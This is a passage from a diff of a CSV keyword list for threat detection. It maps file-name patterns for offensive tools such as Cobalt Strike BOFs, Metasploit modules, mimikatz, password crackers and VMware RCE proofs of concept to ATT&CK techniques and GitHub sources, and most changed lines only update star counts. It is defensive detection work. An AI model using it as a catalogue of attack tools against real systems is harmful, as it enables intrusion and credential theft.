now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Visual-Studio-BOF-template*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*VITE_STRIKER_API*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*VMSA-2023-0001.py*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*vmware_vrni_rce_cve_2023_20887.rb*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" -"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*VMware-vRealize-Log-Insight.cert*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware 
vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*vncdumpdll*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*vncpwdump.*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vnperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*VPNPivot*","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","256","52","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z" "*vRealizeLogInsightRCE*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*vulfocus/spring-core-rce-*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*vulmon*Vulmap*","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","N/A","9","888","196","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z" -"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*vulnfactory.org/exploits/*.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" 
+"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*vu-ls/Crassus*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*vyrus001/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*vysecurity*","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vysecurity/ANGRYPUPPY*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 